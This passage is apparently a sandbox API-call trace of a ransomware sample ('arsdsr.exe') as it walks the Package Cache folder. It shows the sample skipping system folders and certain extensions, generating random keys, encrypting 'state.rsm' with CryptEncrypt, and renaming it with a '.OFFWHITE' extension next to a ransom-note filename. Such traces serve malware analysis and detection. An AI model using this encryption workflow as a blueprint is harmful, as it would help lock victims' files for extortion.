lpString2="KERNEL32.DLL") returned 0 [0151.723] PathFindExtensionW (pszPath="vcredist_x86.exe") returned=".exe" [0151.723] lstrcmpiW (lpString1=".exe", lpString2=".exe") returned 0 [0151.723] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca64c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xca64c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xfe5c3760, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x71080, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="vcredist_x86.exe", cAlternateFileName="VCREDI~1.EXE")) returned 0 [0151.723] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0151.724] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf93c9960, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf93efac0, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf93efac0, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="{f325f05b-f963-4640-a43b-c8a494cdda0f}", cAlternateFileName="{F325F~1")) returned 1 [0151.724] lstrcmpiW (lpString1="{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpString2=".") returned 1 [0151.724] lstrcmpiW (lpString1="{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpString2="..") returned 1 [0151.724] lstrcmpiW (lpString1="{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpString2="...") returned 1 [0151.724] lstrcmpiW (lpString1="{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpString2="windows") returned -1 [0151.724] lstrcmpiW (lpString1="{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpString2="$recycle.bin") returned 1 [0151.724] lstrcmpiW (lpString1="{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpString2="rsa") returned -1 [0151.724] lstrcmpiW (lpString1="{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpString2="ntuser.dat") returned -1 [0151.724] lstrcmpiW (lpString1="{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpString2="programdata") returned -1 [0151.724] lstrcmpiW (lpString1="{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpString2="appdata") returned -1 [0151.724] lstrcmpiW (lpString1="{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpString2="program files") returned -1 [0151.724] lstrcmpiW (lpString1="{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpString2="program files (x86)") returned -1 [0151.724] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Package Cache\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\") returned="C:/Users\\All Users\\Package Cache\\" [0151.724] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\", lpString2="{f325f05b-f963-4640-a43b-c8a494cdda0f}" | out: lpString1="C:/Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}") returned="C:/Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}" [0151.724] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\") returned="C:/Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\" [0151.724] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\") returned="C:/Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\" [0151.724] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*.*") returned="C:/Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*.*" [0151.724] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf93c9960, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf93efac0, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf93efac0, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0151.725] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0151.725] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf93c9960, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf93efac0, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf93efac0, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0151.725] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0151.725] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0151.725] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf93efac0, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf93efac0, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0x6601040, ftLastWriteTime.dwHighDateTime=0x1d2fc28, nFileSizeHigh=0x0, nFileSizeLow=0x2fe, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="state.rsm", cAlternateFileName="")) returned 1 [0151.725] lstrcmpiW (lpString1="state.rsm", lpString2=".") returned 1 [0151.725] lstrcmpiW (lpString1="state.rsm", lpString2="..") returned 1 [0151.725] lstrcmpiW (lpString1="state.rsm", lpString2="...") returned 1 [0151.725] lstrcmpiW (lpString1="state.rsm", lpString2="windows") returned -1 [0151.725] lstrcmpiW (lpString1="state.rsm", lpString2="$recycle.bin") returned 1 [0151.725] lstrcmpiW (lpString1="state.rsm", lpString2="rsa") returned 1 [0151.725] lstrcmpiW (lpString1="state.rsm", lpString2="ntuser.dat") returned 1 [0151.725] lstrcmpiW (lpString1="state.rsm", lpString2="programdata") returned 1 [0151.725] lstrcmpiW (lpString1="state.rsm", lpString2="appdata") returned 1 [0151.725] lstrcmpiW (lpString1="state.rsm", lpString2="program files") returned 1 [0151.725] lstrcmpiW (lpString1="state.rsm", lpString2="program files (x86)") returned 1 [0151.725] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\") returned="C:/Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\" [0151.725] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\", lpString2="state.rsm" | out: lpString1="C:/Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm") returned="C:/Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm" [0151.725] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.726] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.726] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0151.726] lstrcmpiW (lpString1=".rsm", lpString2=".exe") returned 1 [0151.726] lstrcmpiW (lpString1=".rsm", lpString2=".log") returned 1 [0151.726] lstrcmpiW (lpString1=".rsm", lpString2=".cab") returned 1 [0151.726] lstrcmpiW (lpString1=".rsm", lpString2=".cmd") returned 1 [0151.726] lstrcmpiW (lpString1=".rsm", lpString2=".com") returned 1 [0151.726] lstrcmpiW (lpString1=".rsm", lpString2=".cpl") returned 1 [0151.726] lstrcmpiW (lpString1=".rsm", lpString2=".ini") returned 1 [0151.726] lstrcmpiW (lpString1=".rsm", lpString2=".dll") returned 1 [0151.726] lstrcmpiW (lpString1=".rsm", lpString2=".url") returned -1 [0151.726] lstrcmpiW (lpString1=".rsm", lpString2=".ttf") returned -1 [0151.726] lstrcmpiW (lpString1=".rsm", lpString2=".mp3") returned 1 [0151.726] lstrcmpiW (lpString1=".rsm", lpString2=".pif") returned 1 [0151.726] lstrcmpiW (lpString1=".rsm", lpString2=".mp4") returned 1 [0151.726] lstrcmpiW (lpString1=".rsm", lpString2=".OFFWHITE") returned 1 [0151.726] lstrcmpiW (lpString1=".rsm", lpString2=".msi") returned 1 [0151.726] lstrcmpiW (lpString1="state.rsm", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0151.726] GetProcessHeap () returned 0x500000 [0151.726] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526dc8 [0151.726] CreateFileW (lpFileName="C:/Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0151.727] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=766) returned 1 [0151.727] GetProcessHeap () returned 0x500000 [0151.727] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0151.727] GetProcessHeap () returned 0x500000 [0151.727] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0151.727] GetProcessHeap () returned 0x500000 [0151.728] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0151.728] GetProcessHeap () returned 0x500000 [0151.728] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0151.728] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.728] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.728] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0151.728] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.728] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.728] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0151.728] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.728] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.728] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295dc90*=0x100) returned 1 [0151.728] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.728] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.728] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0151.728] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x2fe, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.728] SetLastError (dwErrCode=0x0) [0151.728] WriteFile (in: hFile=0x21c, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0151.730] GetLastError () returned 0x0 [0151.730] GetLastError () returned 0x0 [0151.730] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x3fe, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.730] WriteFile (in: hFile=0x21c, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0151.730] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x4fe, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.730] WriteFile (in: hFile=0x21c, lpBuffer=0x526dc8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x526dc8*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0151.730] GetProcessHeap () returned 0x500000 [0151.730] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x2fe) returned 0x52ee70 [0151.730] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.731] ReadFile (in: hFile=0x21c, lpBuffer=0x52ee70, nNumberOfBytesToRead=0x2fe, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x52ee70*, lpNumberOfBytesRead=0x295dec0*=0x2fe, lpOverlapped=0x0) returned 1 [0151.731] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.731] WriteFile (in: hFile=0x21c, lpBuffer=0x52ee70*, nNumberOfBytesToWrite=0x2fe, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x52ee70*, lpNumberOfBytesWritten=0x295decc*=0x2fe, lpOverlapped=0x0) returned 1 [0151.731] GetProcessHeap () returned 0x500000 [0151.731] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x52ee70 | out: hHeap=0x500000) returned 1 [0151.731] CloseHandle (hObject=0x21c) returned 1 [0151.731] GetProcessHeap () returned 0x500000 [0151.731] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0151.731] GetProcessHeap () returned 0x500000 [0151.731] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0151.731] GetProcessHeap () returned 0x500000 [0151.731] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0151.731] GetProcessHeap () returned 0x500000 [0151.731] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0151.731] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm" | out: lpString1="C:/Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm") returned="C:/Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm" [0151.731] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm.OFFWHITE") returned="C:/Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm.OFFWHITE" [0151.731] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm"), lpNewFileName="C:/Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm.OFFWHITE" (normalized: "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm.offwhite")) returned 1 [0151.732] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xf93c9960, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf93c9960, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xedfa2720, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0xbee30, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="VC_redist.x86.exe", cAlternateFileName="VC_RED~1.EXE")) returned 1 [0151.732] lstrcmpiW (lpString1="VC_redist.x86.exe", lpString2=".") returned 1 [0151.732] lstrcmpiW (lpString1="VC_redist.x86.exe", lpString2="..") returned 1 [0151.732] lstrcmpiW (lpString1="VC_redist.x86.exe", lpString2="...") returned 1 [0151.732] lstrcmpiW (lpString1="VC_redist.x86.exe", lpString2="windows") returned -1 [0151.732] lstrcmpiW (lpString1="VC_redist.x86.exe", lpString2="$recycle.bin") returned 1 [0151.732] lstrcmpiW (lpString1="VC_redist.x86.exe", lpString2="rsa") returned 1 [0151.732] lstrcmpiW (lpString1="VC_redist.x86.exe", lpString2="ntuser.dat") returned 1 [0151.732] lstrcmpiW (lpString1="VC_redist.x86.exe", lpString2="programdata") returned 1 [0151.732] lstrcmpiW (lpString1="VC_redist.x86.exe", lpString2="appdata") returned 1 [0151.732] lstrcmpiW (lpString1="VC_redist.x86.exe", lpString2="program files") returned 1 [0151.732] lstrcmpiW (lpString1="VC_redist.x86.exe", lpString2="program files (x86)") returned 1 [0151.732] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\") returned="C:/Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\" [0151.732] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\", lpString2="VC_redist.x86.exe" | out: lpString1="C:/Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe") returned="C:/Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe" [0151.732] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.732] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.732] PathFindExtensionW (pszPath="VC_redist.x86.exe") returned=".exe" [0151.732] lstrcmpiW (lpString1=".exe", lpString2=".exe") returned 0 [0151.732] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xf93c9960, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf93c9960, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xedfa2720, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0xbee30, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="VC_redist.x86.exe", cAlternateFileName="VC_RED~1.EXE")) returned 0 [0151.732] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0151.732] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", cAlternateFileName="{F8CFE~1.210")) returned 1 [0151.732] lstrcmpiW (lpString1="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpString2=".") returned 1 [0151.732] lstrcmpiW (lpString1="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpString2="..") returned 1 [0151.732] lstrcmpiW (lpString1="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpString2="...") returned 1 [0151.732] lstrcmpiW (lpString1="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpString2="windows") returned -1 [0151.733] lstrcmpiW (lpString1="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpString2="$recycle.bin") returned 1 [0151.733] lstrcmpiW (lpString1="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpString2="rsa") returned -1 [0151.733] lstrcmpiW (lpString1="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpString2="ntuser.dat") returned -1 [0151.733] lstrcmpiW (lpString1="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpString2="programdata") returned -1 [0151.733] lstrcmpiW (lpString1="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpString2="appdata") returned -1 [0151.733] lstrcmpiW (lpString1="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpString2="program files") returned -1 [0151.733] lstrcmpiW (lpString1="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpString2="program files (x86)") returned -1 [0151.733] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Package Cache\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\") returned="C:/Users\\All Users\\Package Cache\\" [0151.733] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\", lpString2="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005" | out: lpString1="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005") returned="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005" [0151.733] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\") returned="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\" [0151.733] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\") returned="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\" [0151.733] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*.*") returned="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*.*" [0151.733] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0151.733] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0151.733] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0151.733] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0151.733] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0151.733] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="packages", cAlternateFileName="")) returned 1 [0151.733] lstrcmpiW (lpString1="packages", lpString2=".") returned 1 [0151.733] lstrcmpiW (lpString1="packages", lpString2="..") returned 1 [0151.733] lstrcmpiW (lpString1="packages", lpString2="...") returned 1 [0151.733] lstrcmpiW (lpString1="packages", lpString2="windows") returned -1 [0151.733] lstrcmpiW (lpString1="packages", lpString2="$recycle.bin") returned 1 [0151.733] lstrcmpiW (lpString1="packages", lpString2="rsa") returned -1 [0151.733] lstrcmpiW (lpString1="packages", lpString2="ntuser.dat") returned 1 [0151.734] lstrcmpiW (lpString1="packages", lpString2="programdata") returned -1 [0151.734] lstrcmpiW (lpString1="packages", lpString2="appdata") returned 1 [0151.734] lstrcmpiW (lpString1="packages", lpString2="program files") returned -1 [0151.734] lstrcmpiW (lpString1="packages", lpString2="program files (x86)") returned -1 [0151.734] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\") returned="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\" [0151.734] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\", lpString2="packages" | out: lpString1="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages") returned="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages" [0151.734] lstrcatW (in: lpString1="C:/Users\\All Users\\Package 